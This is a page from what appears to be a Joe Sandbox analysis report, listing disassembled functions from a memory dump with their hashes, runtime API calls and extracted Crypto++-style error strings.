Opcode ID: 094d6be96b06ea8f88a2b60cabe12f48f45d880d1639f3e4ae731218a418b427
Instruction ID: c45e1e0008f4a5df8678cf6176438175a2b019b7298e91ad92bdf17b5d078d47
Opcode Fuzzy Hash: 094d6be96b06ea8f88a2b60cabe12f48f45d880d1639f3e4ae731218a418b427
Instruction Fuzzy Hash: 6D91587460A3819FD710CF28C880B5BBBF5ABDA708F24491EF89887391D675E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE61200 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 244COMMON

Download Yara Rule

APIs

Part of subcall function 6CE7D820: _memmove.LIBCMT ref: 6CE7D930

Part of subcall function 6CE24010: std::_Xinvalid_argument.LIBCPMT ref: 6CE2402A

__CxxThrowException@8.LIBCMT ref: 6CE613D4

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Part of subcall function 6CE58D80: _malloc.LIBCMT ref: 6CE58D8A
Part of subcall function 6CE58D80: _malloc.LIBCMT ref: 6CE58DAF

Strings

: ciphertext length of , xrefs: 6CE612E4
doesn't match the required length of , xrefs: 6CE61316
for this key, xrefs: 6CE61348

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: _malloc$ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
String ID: doesn't match the required length of $ for this key$: ciphertext length of
API String ID: 1025790555-2559040249
Opcode ID: cc8f54c705751a3fe4930fca0170e7456aaefb1a39336be13e287a300e629e51
Instruction ID: d25ea62c3098205f7431e825e578bb4629e61b19751c3b107600360ff549f314
Opcode Fuzzy Hash: cc8f54c705751a3fe4930fca0170e7456aaefb1a39336be13e287a300e629e51
Instruction Fuzzy Hash: A0A14B715083809FD325CB69C880BDBB7F9AFD9308F144A1DE59993751EB34A909CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 6CE531D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 213COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6CE532BC
_memmove.LIBCMT ref: 6CE532D0

Strings

i7l, xrefs: 6CE531DB, 6CE5320B, 6CE53253, 6CE53285, 6CE53346
i7l, xrefs: 6CE5322C, 6CE53274, 6CE53340

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: _malloc_memmove
String ID: i7l$i7l
API String ID: 1183979061-1099263514
Opcode ID: f5258de96050c933a64b898dc1cb4b74fe6868d1e8ec941d9f318476e99be401
Instruction ID: ff97259b126cb97272c67f37dd8c887559a4a533c5c3ee6e6220b8bd16f0aa74
Opcode Fuzzy Hash: f5258de96050c933a64b898dc1cb4b74fe6868d1e8ec941d9f318476e99be401
Instruction Fuzzy Hash: E081B271A042059FDB04CF58C480B9EBBF1BF45318F7985A8D8399BB51DB31E9A5CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CE8B47D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6CE8B50D

Part of subcall function 6CE91AA0: __87except.LIBCMT ref: 6CE91ADB

Strings

pow, xrefs: 6CE8B4E5, 6CE8B502

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: a49d7ac206a923c796a63d96757a0945394e7ea65ec5b5f0e4211b5f3c81f845
Instruction ID: c654f42dcb8a54a5b2b63a0a5a9e7c1938cf6eb846269b968c853546dc56f54a
Opcode Fuzzy Hash: a49d7ac206a923c796a63d96757a0945394e7ea65ec5b5f0e4211b5f3c81f845
Instruction Fuzzy Hash: 69513A31E0E201D6C701A799CD4139E7BB9DB4375CF308E58E8E942BE8FB34C8958A46

Uniqueness

Uniqueness Score: -1.00%

Function 6CE38560 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 6CE388ED

Part of subcall function 6CE8A116: __mbstowcs_s_l.LIBCMT ref: 6CE8A12C

__cftoe.LIBCMT ref: 6CE38911

Strings

zX, xrefs: 6CE3865E
P, xrefs: 6CE38841

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: __cftoe$__mbstowcs_s_l
String ID: zX$P
API String ID: 1494777130-2079734279
Opcode ID: 020feae848ad63196e4a1128b8c4e71a3f8ba888bc79d02300102c6642cb02dc
Instruction ID: 64fa3df73964ca2ff6bfba0ce9643d28e9b4aedc5b467a9f94adcf64afa23983
Opcode Fuzzy Hash: 020feae848ad63196e4a1128b8c4e71a3f8ba888bc79d02300102c6642cb02dc
Instruction Fuzzy Hash: CA9100B11087819FC376CF15C884BABBBF8BB84714F604A1DE19D5B280DB716645CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE589D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CE58ABB
__CxxThrowException@8.LIBCMT ref: 6CE58B82

Strings

: invalid ciphertext, xrefs: 6CE58B48
PK_DefaultDecryptionFilter: ciphertext too long, xrefs: 6CE58A8E

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw
String ID: : invalid ciphertext$PK_DefaultDecryptionFilter: ciphertext too long
API String ID: 2005118841-483996327
Opcode ID: 09ceda84025f8151bfd9316e535d3979a877ae944fe29cf0f06a27ffafee4b24
Instruction ID: ee45d65091428befd1d17ae52f3f9ca0bc0f314b2dd419fff453a520076b9605
Opcode Fuzzy Hash: 09ceda84025f8151bfd9316e535d3979a877ae944fe29cf0f06a27ffafee4b24
Instruction Fuzzy Hash: 4C514CB51147409FD324CF54C980FABB7F8AB88708F604A1EE59A97B41DB31E909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6CE2F190 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 6CE24760: __CxxThrowException@8.LIBCMT ref: 6CE247F9

Part of subcall function 6CE58D80: _malloc.LIBCMT ref: 6CE58D8A
Part of subcall function 6CE58D80: _malloc.LIBCMT ref: 6CE58DAF

_memcpy_s.LIBCMT ref: 6CE2F282
_memset.LIBCMT ref: 6CE2F293

Strings

@, xrefs: 6CE2F2DE
\|l, xrefs: 6CE2F1F9

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: _malloc$Exception@8Throw_memcpy_s_memset
String ID: @$\|l
API String ID: 3081897325-1699926156
Opcode ID: 71ca7848d247d0d737898c3d36cf9f75e9700d59d8b9c062f136fa3ff873dc07
Instruction ID: f4bf2a951777b29db97397032cc5bcb212f7fe28b91d4215dde2bda45c24bb75
Opcode Fuzzy Hash: 71ca7848d247d0d737898c3d36cf9f75e9700d59d8b9c062f136fa3ff873dc07
Instruction Fuzzy Hash: 3C518E71900258DFDB20CFA4C981BDEBBB4BF45308F20819DD8596B781DB756A49CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE24E80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE24EFC
std::_Xinvalid_argument.LIBCPMT ref: 6CE24F16
_memmove.LIBCMT ref: 6CE24F6C

Part of subcall function 6CE24D90: std::_Xinvalid_argument.LIBCPMT ref: 6CE24DA9
Part of subcall function 6CE24D90: std::_Xinvalid_argument.LIBCPMT ref: 6CE24DCA
Part of subcall function 6CE24D90: std::_Xinvalid_argument.LIBCPMT ref: 6CE24DE5
Part of subcall function 6CE24D90: _memmove.LIBCMT ref: 6CE24E4D

Strings

string too long, xrefs: 6CE24EF7, 6CE24F11

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 19c063e3993b2c48fe7ff5811c33e874e3d78dea76d13221a5d96f826233850a
Instruction ID: ceaf7bb9ac72de545a97fcc1644ab583fd0c72ebe6271a3d4301167748c22f45
Opcode Fuzzy Hash: 19c063e3993b2c48fe7ff5811c33e874e3d78dea76d13221a5d96f826233850a
Instruction Fuzzy Hash: EF31E7323116108BE3359E5CE880B6AF7FAEFD1724770892FE5558BF80C775984587A1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE56920 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 128COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CE56A34

Strings

Dl, xrefs: 6CE56A9C
tl, xrefs: 6CE56A8B, 6CE56A93
: this object does't support a special last block, xrefs: 6CE569BC

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw
String ID: : this object does't support a special last block$tl$Dl
API String ID: 2005118841-1251966107
Opcode ID: 80bd19a1ffba70649ae2b12c743238bea33cedc3c027e7b8c0e51d23477fdb7e
Instruction ID: 4de8acf540f43148d770ae773821b2247c884e5c1472c7ae33ae9bed08b5e44d
Opcode Fuzzy Hash: 80bd19a1ffba70649ae2b12c743238bea33cedc3c027e7b8c0e51d23477fdb7e
Instruction Fuzzy Hash: 58414A712087809FC314DF28C881B5BBBF4BB99618F604A1DF49997750DB34E909CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE22090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 6CE24010: std::_Xinvalid_argument.LIBCPMT ref: 6CE2402A

__CxxThrowException@8.LIBCMT ref: 6CE2211F

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Part of subcall function 6CE24010: std::_Xinvalid_argument.LIBCPMT ref: 6CE24067
Part of subcall function 6CE24010: _memmove.LIBCMT ref: 6CE240C8

__CxxThrowException@8.LIBCMT ref: 6CE221BF

Strings

PK_MessageAccumulator: DigestSize() should not be called, xrefs: 6CE220BD
PK_MessageAccumulator: TruncatedFinal() should not be called, xrefs: 6CE2215D

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
String ID: PK_MessageAccumulator: DigestSize() should not be called$PK_MessageAccumulator: TruncatedFinal() should not be called
API String ID: 1902190269-1268710280
Opcode ID: 2e7bb148bae25f4d359c9037a080f94c6c6817eb670509c8e163ba7a9a828958
Instruction ID: 6de73b795240298b6de14c8ced11c24713a2ada55f9f02cf31ae625b8d7f1b21
Opcode Fuzzy Hash: 2e7bb148bae25f4d359c9037a080f94c6c6817eb670509c8e163ba7a9a828958
Instruction Fuzzy Hash: 97413D70C0528CEEDB01DFE8D880BEDFBB8AB15314F20466EE421A7B91DB745608CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6CE24850 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CE248E9

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE248FE

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Part of subcall function 6CE249C0: std::exception::exception.LIBCMT ref: 6CE249EF
Part of subcall function 6CE249C0: __CxxThrowException@8.LIBCMT ref: 6CE24A04

_memmove.LIBCMT ref: 6CE24945

Strings

0Bl, xrefs: 6CE248F7

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_memmovestd::exception::_
String ID: 0Bl
API String ID: 163498487-3271211234
Opcode ID: cb500a600416eb12d5529d5769c1657b0d2fb19270e3ecc18d0076b46acfe504
Instruction ID: 4c1b9e1bb403e6225854160881a0f76a3ba614a566757c54cc0bc4ee0228131b
Opcode Fuzzy Hash: cb500a600416eb12d5529d5769c1657b0d2fb19270e3ecc18d0076b46acfe504
Instruction Fuzzy Hash: 5041A771D10245AFD704CFACC89079DBBF8EB05364F60422AE82697B80D7789944CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE21D30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 6CE24010: std::_Xinvalid_argument.LIBCPMT ref: 6CE2402A

__CxxThrowException@8.LIBCMT ref: 6CE21DC9

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Part of subcall function 6CE24010: std::_Xinvalid_argument.LIBCPMT ref: 6CE24067
Part of subcall function 6CE24010: _memmove.LIBCMT ref: 6CE240C8

__CxxThrowException@8.LIBCMT ref: 6CE21E74

Strings

BufferedTransformation: this object is not attachable, xrefs: 6CE21D67
CryptoMaterial: this object contains invalid values, xrefs: 6CE21E16

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
String ID: BufferedTransformation: this object is not attachable$CryptoMaterial: this object contains invalid values
API String ID: 1902190269-3853263434
Opcode ID: 7015c75e698dcafe442e34557c93dbcddd4dab0d94d5479b510bfddf96fceb82
Instruction ID: 216f8846e9782f21ff78ad6c54a12d7204fceb570e48e0b3f84cfe8bcb6fc465
Opcode Fuzzy Hash: 7015c75e698dcafe442e34557c93dbcddd4dab0d94d5479b510bfddf96fceb82
Instruction Fuzzy Hash: 74411C71C05288AECB15DFE9D880BDDFBB8AB19314F20866EE42567B91DB745608CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE574C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 6CE7D820: _memmove.LIBCMT ref: 6CE7D930

Part of subcall function 6CE24010: std::_Xinvalid_argument.LIBCPMT ref: 6CE2402A

__CxxThrowException@8.LIBCMT ref: 6CE5761A

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

byte digest to , xrefs: 6CE57565
HashTransformation: can't truncate a , xrefs: 6CE57552
bytes, xrefs: 6CE57594

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
String ID: byte digest to $ bytes$HashTransformation: can't truncate a
API String ID: 39012651-1139078987
Opcode ID: 2655a9a4fac57d14a5f557485178364ad8d97a0c8d2bd4fe0ea1bf4ad3d36fb9
Instruction ID: dd1214c826811377525293c2d71b3fcdac6b8f0f78f38c3002ab7adbf58b845f
Opcode Fuzzy Hash: 2655a9a4fac57d14a5f557485178364ad8d97a0c8d2bd4fe0ea1bf4ad3d36fb9
Instruction Fuzzy Hash: DA4172711083C09ED334CB54D845FDBB7F8AB99318F204A1EF59997780DB7591088BA7

Uniqueness

Uniqueness Score: -1.00%

Function 6CE5BEF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE5BF2D

Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE890ED
Part of subcall function 6CE890D8: __CxxThrowException@8.LIBCMT ref: 6CE89102
Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE89113

Strings

gfff, xrefs: 6CE5BF37
gfff, xrefs: 6CE5BF80
vector<T> too long, xrefs: 6CE5BF28

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
